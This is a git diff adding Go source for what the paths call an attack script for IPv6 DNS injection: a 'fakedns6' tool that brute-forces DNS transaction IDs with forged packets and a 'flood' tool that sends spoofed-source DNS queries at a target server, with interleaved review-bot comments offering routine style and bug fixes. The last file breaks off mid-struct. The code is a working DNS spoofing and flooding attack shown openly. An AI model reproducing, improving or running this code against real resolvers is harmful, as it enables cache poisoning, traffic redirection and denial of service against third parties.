+ /* This is used for early termination */ + //verification packet + //xmitUDPv6(localIP, resolverBackendIP, layers.UDPPort(targetPort), 65535, 2, 0) + //go bruteForceTerminatingTimer( /*jitter + defaultJitter*/ defaultJitter + 60) + + //continue brute force + for txid = GROUP_SIZE * 2; txid < 0xffff; txid++ { + /* This is used for early termination */ + //if bruteForceCouldBeKilled && bruteForceShouldBeKilled { + // fmt.Println("DNS Brute force aborted") + // break + //} + dnsLayer.ID = txid 
+ err := Send(handle, ethernetLayer, &ipLayer, &udpLayer, &dnsLayer) + if err != nil { + fmt.Println("can not send packet @ DNSBruteForce: ", err) + } + if timegap != 0 { + time.Sleep(time.Duration(timegap) * time.Microsecond) + } + } + + //0xffff is missing from packet trace + /* This is used for early termination */ + //if !bruteForceShouldBeKilled { + dnsLayer.ID = 0xffff + err = Send(handle, ethernetLayer, &ipLayer, &udpLayer, &dnsLayer) + if err != nil { + fmt.Println("can not send packet @ DNSBruteForce pos 2: ", err) + } + //} + if debugOutput { + fmt.Println("time: ", time.Now().Sub(startTime)) + } + + //help to recover the global counter + time.Sleep(time.Duration(60+ /*jitter + defaultJitter*/ defaultJitter) * time.Millisecond) +} diff --git a/att script/4_v6_注入/code/src/fakedns6/go.mod b/att script/4_v6_注入/code/src/fakedns6/go.mod new file mode 100644 index 0000000..4baf665 --- /dev/null +++ b/att script/4_v6_注入/code/src/fakedns6/go.mod @@ -0,0 +1,15 @@ +module fakedns6 + +go 1.20 + +require ( + github.com/google/gopacket v1.1.19 + github.com/miekg/dns v1.1.57 +) + +require ( + golang.org/x/mod v0.12.0 // indirect + golang.org/x/net v0.17.0 // indirect + golang.org/x/sys v0.13.0 // indirect + golang.org/x/tools v0.13.0 // indirect +) diff --git a/att script/4_v6_注入/code/src/fakedns6/go.sum b/att script/4_v6_注入/code/src/fakedns6/go.sum new file mode 100644 index 0000000..5ab4292 --- /dev/null +++ b/att script/4_v6_注入/code/src/fakedns6/go.sum 
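Review bot: A point of style in `dnsBruteForce`: the second send loop declares a fresh `err := Send(...)` that shadows the `err` already in scope, while the first loop and the trailing send assign with `err =`; using `err = Send(handle, ethernetLayer, &ipLayer, &udpLayer, &dnsLayer)` keeps the three call sites consistent and avoids a shadow that `go vet -shadow` would flag. In the timing printout, `time.Now().Sub(startTime)` is the long form of `time.Since(startTime)`, which staticcheck (S1012) reports. `bruteForceTerminatingTimer` and the `bruteForceCouldBeKilled` flag it sets are only referenced from commented-out code in this hunk, so they appear to be dead and could carry a comment saying so or be removed.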
@@ -0,0 +1,25 @@ +github.com/google/gopacket v1.1.19 h1:ves8RnFZPGiFnTS0uPQStjwru6uO6h+nlr9j6fL7kF8= +github.com/google/gopacket v1.1.19/go.mod h1:iJ8V8n6KS+z2U1A8pUwu8bW5SyEMkXJB8Yo/Vo+TKTo= +github.com/miekg/dns v1.1.57 h1:Jzi7ApEIzwEPLHWRcafCN9LZSBbqQpxjt/wpgvg7wcM= +github.com/miekg/dns v1.1.57/go.mod h1:uqRjCRUuEAA6qsOiJvDd+CFo/vW+y5WR6SNmHE55hZk= +golang.org/x/crypto v0.0.0-20190308221718-c2843e01d9a2/go.mod h1:djNgcEr1/C05ACkg1iLfiJU5Ep61QUkGW8qpdssI0+w= +golang.org/x/crypto v0.0.0-20191011191535-87dc89f01550/go.mod h1:yigFU9vqHzYiE8UmvKecakEJjdnWj3jj499lnFckfCI= +golang.org/x/lint v0.0.0-20200302205851-738671d3881b/go.mod h1:3xt1FjdF8hUf6vQPIChWIBhFzV8gjjsPE/fR3IyQdNY= +golang.org/x/mod v0.1.1-0.20191105210325-c90efee705ee/go.mod h1:QqPTAvyqsEbceGzBzNggFXnrqF1CaUcvgkdR5Ot7KZg= +golang.org/x/mod v0.12.0 h1:rmsUpXtvNzj340zd98LZ4KntptpfRHwpFOHG188oHXc= +golang.org/x/mod v0.12.0/go.mod h1:iBbtSCu2XBx23ZKBPSOrRkjjQPZFPuis4dIYUhu/chs= +golang.org/x/net v0.0.0-20190404232315-eb5bcb51f2a3/go.mod h1:t9HGtf8HONx5eT2rtn7q6eTqICYqUVnKs3thJo3Qplg= +golang.org/x/net v0.0.0-20190620200207-3b0461eec859/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s= +golang.org/x/net v0.17.0 h1:pVaXccu2ozPjCXewfr1S7xza/zcXTity9cCdXQYSjIM= +golang.org/x/net v0.17.0/go.mod h1:NxSsAGuq816PNPmqtQdLE42eU2Fs7NoRIZrHJAlaCOE= +golang.org/x/sync v0.0.0-20190423024810-112230192c58/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= +golang.org/x/sync v0.4.0 h1:zxkM55ReGkDlKSM+Fu41A+zmbZuaPVbGMzvvdUPznYQ= +golang.org/x/sys v0.0.0-20190215142949-d0b11bdaac8a/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY= +golang.org/x/sys v0.0.0-20190412213103-97732733099d/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= +golang.org/x/sys v0.13.0 h1:Af8nKPmuFypiUBjVoU9V20FiaFXOcuZI21p0ycVYYGE= +golang.org/x/sys v0.13.0/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= +golang.org/x/text v0.3.0/go.mod h1:NqM8EUOU14njkJ3fqMW+pc6Ldnwhi/IjpwHt7yyuwOQ= +golang.org/x/tools 
v0.0.0-20200130002326-2f3ba24bd6e7/go.mod h1:TB2adYChydJhpapKDTa4BR/hXlZSLoq2Wpct/0txZ28= +golang.org/x/tools v0.13.0 h1:Iey4qkscZuv0VvIt8E0neZjtPVQFSc870HQ448QgEmQ= +golang.org/x/tools v0.13.0/go.mod h1:HvlwmtVNQAhOuCjW7xxvovg8wbNq7LwfXh/k7wXUl58= +golang.org/x/xerrors v0.0.0-20191011141410-1b5146add898/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0=
diff --git a/att script/4_v6_注入/code/src/fakedns6/ipv6util.go b/att script/4_v6_注入/code/src/fakedns6/ipv6util.go
new file mode 100644
index 0000000..09245d3
--- /dev/null
+++ b/att script/4_v6_注入/code/src/fakedns6/ipv6util.go
@@ -0,0 +1,103 @@
+package main
+
+import (
+ "encoding/hex"
+ "fmt"
+ "net"
+ "os/exec"
+ "strings"
+ "syscall"
+ "unsafe"
+)
+
+type router struct {
+ ifaces []net.Interface
+ addrs []net.IP
+ v6 routeSlice
+}
+type routeSlice []*rtInfo
+
+type rtInfo struct {
+ // Dst net.IPNet
+ Gateway, PrefSrc net.IP
+ OutputIface uint32
+ Priority uint32
+}
+
+func getv6Gateway() (net.IP, error) {
+ rtr := &router{}
+
+ tab, err := syscall.NetlinkRIB(syscall.RTM_GETROUTE, syscall.AF_INET6)
+ if err != nil {
+ return nil, err
+ }
+
+ msgs, err := syscall.ParseNetlinkMessage(tab)
+ if err != nil {
+ return nil, err
+ }
+
+ for _, m := range msgs {
+ switch m.Header.Type {
+ case syscall.NLMSG_DONE:
+ break
+ case syscall.RTM_NEWROUTE:
+ // rtmsg := (*syscall.RtMsg)(unsafe.Pointer(&m.Data[0]))
+ attrs, err := syscall.ParseNetlinkRouteAttr(&m)
+ if err != nil {
+ return nil, err
+ }
+ routeInfo := rtInfo{}
+ rtr.v6 = append(rtr.v6, &routeInfo)
+ for _, attr := range attrs {
+ switch attr.Attr.Type {
+ // case syscall.RTA_DST:
+ // routeInfo.Dst.IP = net.IP(attr.Value)
+ // routeInfo.Dst.Mask = net.CIDRMask(int(rtmsg.Dst_len), len(attr.Value)*8)
+ case syscall.RTA_GATEWAY:
+ routeInfo.Gateway = net.IP(attr.Value)
+ case syscall.RTA_OIF:
+ routeInfo.OutputIface = *(*uint32)(unsafe.Pointer(&attr.Value[0]))
+ case syscall.RTA_PRIORITY:
+ routeInfo.Priority = *(*uint32)(unsafe.Pointer(&attr.Value[0]))
+ case syscall.RTA_PREFSRC:
+ routeInfo.PrefSrc = net.IP(attr.Value)
+ }
+ }
+ }
+ }
+ ips := []net.IP{}
+ for _, rt := range rtr.v6 {
+ if rt.Gateway != nil {
+ ips = append(ips, rt.Gateway)
+ }
+ }
+ return ips[0], nil
+}
+
+func getGatewayV6Mac(ifacename string, gwIP net.IP) (net.HardwareAddr, error) {
+ if debugOutput {
+ println("邻居发现--使用网卡接口为:" + ifacename)
+ }
+ out, err := exec.Command("ip", "-6", "neighbor", "show", "dev", ifacename).Output()
+ if err != nil {
+ println(err.Error())
+ } else {
+ outlines := strings.Split(string(out), "/n")
+ for _, line := range outlines {
+ linelist := strings.Split(line, " ")
+ // 与网关对应的MAC地址
+ if linelist[0] == gwIP.String() {
+
+ maclist := strings.Split(linelist[2], ":")
+ var macbyte []byte
+ for _, m := range maclist {
+ b, _ := hex.DecodeString(m)
+ macbyte = append(macbyte, b[0])
+ }
+ return net.HardwareAddr(macbyte), nil
+ }
+ }
+ }
+ return nil, fmt.Errorf("无法找到网关" + gwIP.String() + "对应的MAC地址")
+}
diff --git a/att script/4_v6_注入/code/src/fakedns6/library.go b/att script/4_v6_注入/code/src/fakedns6/library.go
new file mode 100644
index 0000000..edc4548
--- /dev/null
+++ b/att script/4_v6_注入/code/src/fakedns6/library.go
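Review bot: `getv6Gateway` returns `ips[0]` without checking that any route carried an `RTA_GATEWAY` attribute, so a host with no IPv6 gateway route dies with an index-out-of-range panic instead of the `error` the signature already offers; `if len(ips) == 0 { return nil, fmt.Errorf("no IPv6 gateway route found") }` before the final return is the natural guard. The `break` under `case syscall.NLMSG_DONE:` only leaves the `switch`, not the enclosing `for`, so it is a no-op and should be dropped or turned into a labelled break. The `router.ifaces` and `router.addrs` fields are declared but never read, and `b, _ := hex.DecodeString(m)` discards a parse error before indexing `b[0]`. This file is byte-identical to `src/flood/ipv6util.go` (both headers show blob `09245d3`); keeping a single copy avoids the two drifting apart.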
@@ -0,0 +1,171 @@
+package main
+
+import (
+ "encoding/binary"
+ "errors"
+ "fmt"
+ "github.com/google/gopacket"
+ "github.com/google/gopacket/layers"
+ "github.com/google/gopacket/pcap"
+ "net"
+ "time"
+)
+
+func GetIfaceAddrMulti(iface *net.Interface) ([]net.IP, error) {
+ addrs, err := iface.Addrs()
+ if err != nil {
+ return nil, errors.New("can not get ip address")
+ }
+
+ var srcIP []net.IP
+ for _, address := range addrs {
+ if ipnet, ok := address.(*net.IPNet); ok && !ipnet.IP.IsLoopback() {
+ if ipnet.IP.To16() != nil {
+ //check repeat
+ okToAdd := true
+ for _, temp := range srcIP {
+ if compareIPv6Addr(temp, ipnet.IP.To16()) == 0 {
+ okToAdd = false
+ break
+ }
+ }
+ if okToAdd {
+ srcIP = append(srcIP, ipnet.IP.To16())
+ }
+ }
+ }
+ }
+
+ if srcIP == nil || len(srcIP) == 0 {
+ return nil, errors.New("can not get ip address")
+ }
+
+ return srcIP, nil
+}
+
+func Send(handle *pcap.Handle, l ...gopacket.SerializableLayer) error {
+ opts := gopacket.SerializeOptions{
+ FixLengths: true,
+ ComputeChecksums: true,
+ }
+ buffer := gopacket.NewSerializeBuffer()
+ if err := gopacket.SerializeLayers(buffer, opts, l...); err != nil {
+ return err
+ }
+ return handle.WritePacketData(buffer.Bytes())
+}
+
+func GetIfaceAddr(iface *net.Interface) (net.IP, error) {
+ addrs, err := iface.Addrs()
+ if err != nil {
+ return nil, errors.New("can not get ip address")
+ }
+
+ var srcIP net.IP
+ for _, address := range addrs {
+ if ipnet, ok := address.(*net.IPNet); ok && !ipnet.IP.IsLoopback() {
+ if ipnet.IP.To16() != nil {
+ srcIP = ipnet.IP.To16()
+ break
+ }
+ }
+ }
+
+ if srcIP == nil {
+ return nil, errors.New("can not get ip address")
+ }
+
+ return srcIP, nil
+}
+
+func GetGatewayAddr(iface *net.Interface, handle *pcap.Handle, gatewayIP net.IP) (net.HardwareAddr, error) {
+ srcIP, err := GetIfaceAddr(iface)
+ if err != nil {
+ return nil, errors.New("can not get ip address")
+ }
+
+ start := time.Now()
+ // Prepare the layers to send for an ARP request.
+ eth := layers.Ethernet{
+ SrcMAC: iface.HardwareAddr,
+ DstMAC: net.HardwareAddr{0xff, 0xff, 0xff, 0xff, 0xff, 0xff},
+ EthernetType: layers.EthernetTypeARP,
+ }
+ arp := layers.ARP{
+ AddrType: layers.LinkTypeEthernet,
+ Protocol: layers.EthernetTypeIPv6,
+ HwAddressSize: 6,
+ ProtAddressSize: 4,
+ Operation: layers.ARPRequest,
+ SourceHwAddress: []byte(iface.HardwareAddr),
+ SourceProtAddress: []byte(srcIP),
+ DstHwAddress: []byte{0, 0, 0, 0, 0, 0},
+ DstProtAddress: []byte(gatewayIP),
+ }
+ // Send a single ARP request packet (we never retry a send, since this
+ // is just an example ;)
+ if err := Send(handle, ð, &arp); err != nil {
+ return nil, err
+ }
+ // Wait 3 seconds for an ARP reply.
+ for {
+ if time.Since(start) > time.Second*3 {
+ return nil, errors.New("timeout getting ARP reply")
+ }
+ data, _, err := handle.ReadPacketData()
+ if err == pcap.NextErrorTimeoutExpired {
+ continue
+ } else if err != nil {
+ return nil, err
+ }
+ packet := gopacket.NewPacket(data, layers.LayerTypeEthernet, gopacket.NoCopy)
+ if arpLayer := packet.Layer(layers.LayerTypeARP); arpLayer != nil {
+ arp := arpLayer.(*layers.ARP)
+ if net.IP(arp.SourceProtAddress).Equal(gatewayIP) {
+ return arp.SourceHwAddress, nil
+ }
+ }
+ }
+}
+
+func compareIPv6Addr(ip0 net.IP, ip1 net.IP) int {
+ temp0 := binary.LittleEndian.Uint32(ip0.To16())
+ temp1 := binary.LittleEndian.Uint32(ip1.To16())
+ if temp0 == temp1 {
+ return 0
+ }
+ if temp0 > temp1 {
+ return 1
+ }
+ return -1
+}
+
+func xmitUDPv6(srcIP net.IP, dstIP net.IP, srcPort layers.UDPPort, dstPort layers.UDPPort, flowlabel uint32, timegap uint32) {
+
+ ipLayer := layers.IPv6{
+ FlowLabel: flowlabel,
+ SrcIP: srcIP,
+ DstIP: dstIP,
+ Version: 6,
+ HopLimit: 64,
+ NextHeader: layers.IPProtocolUDP,
+ }
+ udpLayer := layers.UDP{
+ SrcPort: srcPort,
+ DstPort: dstPort,
+ }
+
+ err := udpLayer.SetNetworkLayerForChecksum(&ipLayer)
+ if err != nil {
+ fmt.Println("xmitUDPv6 can not SetNetworkLayerForChecksum", err)
+ }
+ err = Send(handle, ethernetLayer, &ipLayer, &udpLayer)
+ if err != nil {
+ fmt.Println("xmitUDPv6 can not send packet", err)
+ }
+
+ if timegap != 0 {
+ time.Sleep(time.Duration(timegap) * time.Microsecond)
+ }
+
+}
diff --git a/att script/4_v6_注入/code/src/flood/go.mod b/att script/4_v6_注入/code/src/flood/go.mod
new file mode 100644
index 0000000..b55b38b
--- /dev/null
+++ b/att script/4_v6_注入/code/src/flood/go.mod
@@ -0,0 +1,20 @@
+module flood
+
+go 1.21
+
+toolchain go1.21.4
+
+require (
+ github.com/google/gopacket v1.1.19
+ github.com/jackpal/gateway v1.0.13
+)
+
+require (
+ github.com/davecgh/go-spew v1.1.1 // indirect
+ github.com/pmezard/go-difflib v1.0.0 // indirect
+ github.com/stretchr/objx v0.5.0 // indirect
+ github.com/stretchr/testify v1.8.4 // indirect
+ golang.org/x/net v0.17.0 // indirect
+ golang.org/x/sys v0.13.0 // indirect
+ gopkg.in/yaml.v3 v3.0.1 // indirect
+)
diff --git a/att script/4_v6_注入/code/src/flood/go.sum b/att script/4_v6_注入/code/src/flood/go.sum
new file mode 100644
index 0000000..1cca74c
--- /dev/null
+++ b/att script/4_v6_注入/code/src/flood/go.sum
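Review bot: `GetGatewayAddr` builds an ARP request with `Protocol: layers.EthernetTypeIPv6` and `ProtAddressSize: 4` while `SourceProtAddress` and `DstProtAddress` are the 16-byte values from `To16()`; ARP has no IPv6 variant and the declared size disagrees with the payload, so the function looks either dead (the `ip -6 neighbor` lookup in `ipv6util.go` is what resolves the gateway elsewhere in this change) or mis-specified, and should be removed or get a doc comment stating what it is expected to resolve. `compareIPv6Addr` compares only the leading four bytes of each address via `binary.LittleEndian.Uint32`, which is worth stating in a comment because the name suggests a full comparison. `srcIP == nil || len(srcIP) == 0` in `GetIfaceAddrMulti` reduces to `len(srcIP) == 0`. `xmitUDPv6` reads the package-level `handle` and `ethernetLayer`, which are declared outside this file; a short comment naming where they are initialised would help readers of this file.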
@@ -0,0 +1,38 @@ +github.com/davecgh/go-spew v1.1.0/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38= +github.com/davecgh/go-spew v1.1.1 h1:vj9j/u1bqnvCEfJOwUhtlOARqs3+rkHYY13jYWTU97c= +github.com/davecgh/go-spew v1.1.1/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38= +github.com/google/gopacket v1.1.19 h1:ves8RnFZPGiFnTS0uPQStjwru6uO6h+nlr9j6fL7kF8= +github.com/google/gopacket v1.1.19/go.mod h1:iJ8V8n6KS+z2U1A8pUwu8bW5SyEMkXJB8Yo/Vo+TKTo= +github.com/jackpal/gateway v1.0.13 h1:fJccMvawxx0k7S1q7Fy/SXFE0R3hMXkMuw8y9SofWAk= +github.com/jackpal/gateway v1.0.13/go.mod h1:6c8LjW+FVESFmwxaXySkt7fU98Yv806ADS3OY6Cvh2U= +github.com/pmezard/go-difflib v1.0.0 h1:4DBwDE0NGyQoBHbLQYPwSUPoCMWR5BEzIk/f1lZbAQM= +github.com/pmezard/go-difflib v1.0.0/go.mod h1:iKH77koFhYxTK1pcRnkKkqfTogsbg7gZNVY4sRDYZ/4= +github.com/stretchr/objx v0.1.0/go.mod h1:HFkY916IF+rwdDfMAkV7OtwuqBVzrE8GR6GFx+wExME= +github.com/stretchr/objx v0.4.0/go.mod h1:YvHI0jy2hoMjB+UWwv71VJQ9isScKT/TqJzVSSt89Yw= +github.com/stretchr/objx v0.5.0 h1:1zr/of2m5FGMsad5YfcqgdqdWrIhu+EBEJRhR1U7z/c= +github.com/stretchr/objx v0.5.0/go.mod h1:Yh+to48EsGEfYuaHDzXPcE3xhTkx73EhmCGUpEOglKo= +github.com/stretchr/testify v1.7.1/go.mod h1:6Fq8oRcR53rry900zMqJjRRixrwX3KX962/h/Wwjteg= +github.com/stretchr/testify v1.8.0/go.mod h1:yNjHg4UonilssWZ8iaSj1OCr/vHnekPRkoO+kdMU+MU= +github.com/stretchr/testify v1.8.4 h1:CcVxjf3Q8PM0mHUKJCdn+eZZtm5yQwehR5yeSVQQcUk= +github.com/stretchr/testify v1.8.4/go.mod h1:sz/lmYIOXD/1dqDmKjjqLyZ2RngseejIcXlSw2iwfAo= +golang.org/x/crypto v0.0.0-20190308221718-c2843e01d9a2/go.mod h1:djNgcEr1/C05ACkg1iLfiJU5Ep61QUkGW8qpdssI0+w= +golang.org/x/crypto v0.0.0-20191011191535-87dc89f01550/go.mod h1:yigFU9vqHzYiE8UmvKecakEJjdnWj3jj499lnFckfCI= +golang.org/x/lint v0.0.0-20200302205851-738671d3881b/go.mod h1:3xt1FjdF8hUf6vQPIChWIBhFzV8gjjsPE/fR3IyQdNY= +golang.org/x/mod v0.1.1-0.20191105210325-c90efee705ee/go.mod h1:QqPTAvyqsEbceGzBzNggFXnrqF1CaUcvgkdR5Ot7KZg= +golang.org/x/net 
v0.0.0-20190404232315-eb5bcb51f2a3/go.mod h1:t9HGtf8HONx5eT2rtn7q6eTqICYqUVnKs3thJo3Qplg= +golang.org/x/net v0.0.0-20190620200207-3b0461eec859/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s= +golang.org/x/net v0.17.0 h1:pVaXccu2ozPjCXewfr1S7xza/zcXTity9cCdXQYSjIM= +golang.org/x/net v0.17.0/go.mod h1:NxSsAGuq816PNPmqtQdLE42eU2Fs7NoRIZrHJAlaCOE= +golang.org/x/sync v0.0.0-20190423024810-112230192c58/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= +golang.org/x/sys v0.0.0-20190215142949-d0b11bdaac8a/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY= +golang.org/x/sys v0.0.0-20190412213103-97732733099d/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= +golang.org/x/sys v0.13.0 h1:Af8nKPmuFypiUBjVoU9V20FiaFXOcuZI21p0ycVYYGE= +golang.org/x/sys v0.13.0/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= +golang.org/x/text v0.3.0/go.mod h1:NqM8EUOU14njkJ3fqMW+pc6Ldnwhi/IjpwHt7yyuwOQ= +golang.org/x/tools v0.0.0-20200130002326-2f3ba24bd6e7/go.mod h1:TB2adYChydJhpapKDTa4BR/hXlZSLoq2Wpct/0txZ28= +golang.org/x/xerrors v0.0.0-20191011141410-1b5146add898/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0= +gopkg.in/check.v1 v0.0.0-20161208181325-20d25e280405 h1:yhCVgyC4o1eVCa2tZl7eS0r+SDo693bJlVdllGtEeKM= +gopkg.in/check.v1 v0.0.0-20161208181325-20d25e280405/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0= +gopkg.in/yaml.v3 v3.0.0-20200313102051-9f266ea9e77c/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM= +gopkg.in/yaml.v3 v3.0.1 h1:fxVm/GzAzEWqLHuvctI91KS9hhNmmWOoWu0XTYJS7CA= +gopkg.in/yaml.v3 v3.0.1/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM=
diff --git a/att script/4_v6_注入/code/src/flood/ipv6util.go b/att script/4_v6_注入/code/src/flood/ipv6util.go
new file mode 100644
index 0000000..09245d3
--- /dev/null
+++ b/att script/4_v6_注入/code/src/flood/ipv6util.go
@@ -0,0 +1,103 @@
+package main
+
+import (
+ "encoding/hex"
+ "fmt"
+ "net"
+ "os/exec"
+ "strings"
+ "syscall"
+ "unsafe"
+)
+
+type router struct {
+ ifaces []net.Interface
+ addrs []net.IP
+ v6 routeSlice
+}
+type routeSlice []*rtInfo
+
+type rtInfo struct {
+ // Dst net.IPNet
+ Gateway, PrefSrc net.IP
+ OutputIface uint32
+ Priority uint32
+}
+
+func getv6Gateway() (net.IP, error) {
+ rtr := &router{}
+
+ tab, err := syscall.NetlinkRIB(syscall.RTM_GETROUTE, syscall.AF_INET6)
+ if err != nil {
+ return nil, err
+ }
+
+ msgs, err := syscall.ParseNetlinkMessage(tab)
+ if err != nil {
+ return nil, err
+ }
+
+ for _, m := range msgs {
+ switch m.Header.Type {
+ case syscall.NLMSG_DONE:
+ break
+ case syscall.RTM_NEWROUTE:
+ // rtmsg := (*syscall.RtMsg)(unsafe.Pointer(&m.Data[0]))
+ attrs, err := syscall.ParseNetlinkRouteAttr(&m)
+ if err != nil {
+ return nil, err
+ }
+ routeInfo := rtInfo{}
+ rtr.v6 = append(rtr.v6, &routeInfo)
+ for _, attr := range attrs {
+ switch attr.Attr.Type {
+ // case syscall.RTA_DST:
+ // routeInfo.Dst.IP = net.IP(attr.Value)
+ // routeInfo.Dst.Mask = net.CIDRMask(int(rtmsg.Dst_len), len(attr.Value)*8)
+ case syscall.RTA_GATEWAY:
+ routeInfo.Gateway = net.IP(attr.Value)
+ case syscall.RTA_OIF:
+ routeInfo.OutputIface = *(*uint32)(unsafe.Pointer(&attr.Value[0]))
+ case syscall.RTA_PRIORITY:
+ routeInfo.Priority = *(*uint32)(unsafe.Pointer(&attr.Value[0]))
+ case syscall.RTA_PREFSRC:
+ routeInfo.PrefSrc = net.IP(attr.Value)
+ }
+ }
+ }
+ }
+ ips := []net.IP{}
+ for _, rt := range rtr.v6 {
+ if rt.Gateway != nil {
+ ips = append(ips, rt.Gateway)
+ }
+ }
+ return ips[0], nil
+}
+
+func getGatewayV6Mac(ifacename string, gwIP net.IP) (net.HardwareAddr, error) {
+ if debugOutput {
+ println("邻居发现--使用网卡接口为:" + ifacename)
+ }
+ out, err := exec.Command("ip", "-6", "neighbor", "show", "dev", ifacename).Output()
+ if err != nil {
+ println(err.Error())
+ } else {
+ outlines := strings.Split(string(out), "/n")
+ for _, line := range outlines {
+ linelist := strings.Split(line, " ")
+ // 与网关对应的MAC地址
+ if linelist[0] == gwIP.String() {
+
+ maclist := strings.Split(linelist[2], ":")
+ var macbyte []byte
+ for _, m := range maclist {
+ b, _ := hex.DecodeString(m)
+ macbyte = append(macbyte, b[0])
+ }
+ return net.HardwareAddr(macbyte), nil
+ }
+ }
+ }
+ return nil, fmt.Errorf("无法找到网关" + gwIP.String() + "对应的MAC地址")
+}
diff --git a/att script/4_v6_注入/code/src/flood/main.go b/att script/4_v6_注入/code/src/flood/main.go
new file mode 100644
index 0000000..be0f1b4
--- /dev/null
+++ b/att script/4_v6_注入/code/src/flood/main.go
@@ -0,0 +1,192 @@
+package main
+
+import (
+ "errors"
+ "flag"
+ "fmt"
+ "math/rand"
+ "net"
+ "os"
+ "strconv"
+
+ "github.com/google/gopacket"
+ "github.com/google/gopacket/layers"
+ "github.com/google/gopacket/pcap"
+)
+
+// 各层的定义
+var ethernetLayer *layers.Ethernet
+var debugOutput = false
+var handle *pcap.Handle
+var repeatTime = 100
+
+func main() {
+ // 读取参数配置
+ ifaceNameArg := flag.String("i", "vmnet1", "用于发送查询包的网络端口")
+ sourceaddrArg := flag.String("saddr", "", "伪造报文的源地址")
+ targetaddrArg := flag.String("taddr", "", "目标权威的地址")
+ qnameArg := flag.String("q", "www.baidu.com.", "请求查询的域名")
+ debugOutputArg := flag.Bool("d", false, "debug模式输出")
+ flag.Parse()
+
+ // 指针->值
+ ifaceName := *ifaceNameArg
+ sourceaddr := *sourceaddrArg
+ targetaddr := *targetaddrArg
+ qname := *qnameArg
+ debugOutput = *debugOutputArg
+ defer os.Exit(0)
+
+ handle, _ = pcap.OpenLive(
+ ifaceName,
+ 65536,
+ true,
+ pcap.BlockForever,
+ )
+
+ // 构造MAC层
+ var srcmac net.HardwareAddr
+ var dstmac net.HardwareAddr
+ if ifaceName == "" {
+ ifaceName = "eth0"
+ }
+
+ // 源MAC
+ loiface, err := net.InterfaceByName(ifaceName)
+ if err != nil {
+ fmt.Println(err.Error())
+ }
+ srcmac = loiface.HardwareAddr
+ if debugOutput {
+ fmt.Println("源MAC地址为: " + srcmac.String())
+ }
+
+ // 目的MAC
+ // 获取网关地址
+ gwIP, _ := getv6Gateway()
+ fmt.Println("网关IPv6地址为:" + gwIP.String())
+ dstmac, err = GetGatewayIPv6Addr(loiface, gwIP)
+ if err != nil {
+ fmt.Println(err.Error())
+ }
+ if debugOutput {
+ fmt.Println("目的MAC地址为: " + dstmac.String())
+ }
+
+ // mac层包
+ ethernetLayer = &layers.Ethernet{
+ SrcMAC: srcmac,
+ DstMAC: dstmac,
+ EthernetType: layers.EthernetTypeIPv6,
+ }
+
+ // dns查询
+ for i := 0; i < repeatTime; i++ {
+ go sendDNSRequest(uint16(rand.Uint32()), qname, net.ParseIP(sourceaddr), net.ParseIP(targetaddr))
+ }
+ if debugOutput {
+ fmt.Println("已连续发送" + strconv.Itoa(repeatTime) + "个请求包到" + targetaddr)
+ }
+}
+
+func Send(handle *pcap.Handle, l ...gopacket.SerializableLayer) error {
+ opts := gopacket.SerializeOptions{
+ FixLengths: true,
+ ComputeChecksums: true,
+ }
+ buffer := gopacket.NewSerializeBuffer()
+ if err := gopacket.SerializeLayers(buffer, opts, l...); err != nil {
+ return err
+ }
+ err := handle.WritePacketData(buffer.Bytes())
+ if err != nil {
+ println(err.Error())
+ }
+ return nil
+}
+
+func GetIfaceAddr(iface *net.Interface) (net.IP, error) {
+ addrs, err := iface.Addrs()
+ if err != nil {
+ return nil, errors.New("can not get ip address")
+ }
+
+ var srcIP net.IP
+ for _, address := range addrs {
+ if ipnet, ok := address.(*net.IPNet); ok && !ipnet.IP.IsLoopback() {
+ if ipnet.IP.To16() != nil {
+ srcIP = ipnet.IP.To16()
+ break
+ }
+ }
+ }
+
+ if srcIP == nil {
+ return nil, errors.New("can not get ip address")
+ }
+
+ return srcIP, nil
+}
+
+func GetGatewayIPv6Addr(iface *net.Interface, gatewayIP net.IP) (net.HardwareAddr, error) {
+ gwMAC, err := getGatewayV6Mac(iface.Name, gatewayIP)
+ if err != nil {
+ fmt.Println(err.Error())
+ panic("")
+ }
+ return gwMAC, nil
+}
+
+func sendDNSRequest(id uint16, name string, resolverIP net.IP, authIP net.IP) {
+ if debugOutput {
+ fmt.Println("Send new DNS request", name, id, resolverIP.String(), authIP.String())
+ }
+ _sendDNSRequest(id, name, resolverIP, authIP, (layers.UDPPort)(rand.Uint32()), 53)
+}
+
+func _sendDNSRequest(id uint16, name string, src net.IP, dst net.IP, sport layers.UDPPort, dport layers.UDPPort) {
+ ipLayer := layers.IPv6{
+ FlowLabel: 1,
+ SrcIP: src,
+ DstIP: dst,
+ Version: 6,
+ HopLimit: 64,
+ NextHeader: layers.IPProtocolUDP,
+ //Flags: layers.IPv4DontFragment,
+ }
+ udpLayer := layers.UDP{
+ SrcPort: sport,
+ DstPort: dport,
+ }
+ dnsLayer := layers.DNS{
+ ID: id,
+ QR: false,
+ OpCode: 0,
+ AA: false,
+ TC: false,
+ RD: true,
+ RA: false,
+ Z: 0,
+ ResponseCode: 0,
+ QDCount: 1,
+ ANCount: 0,
+ NSCount: 0,
+ ARCount: 0,
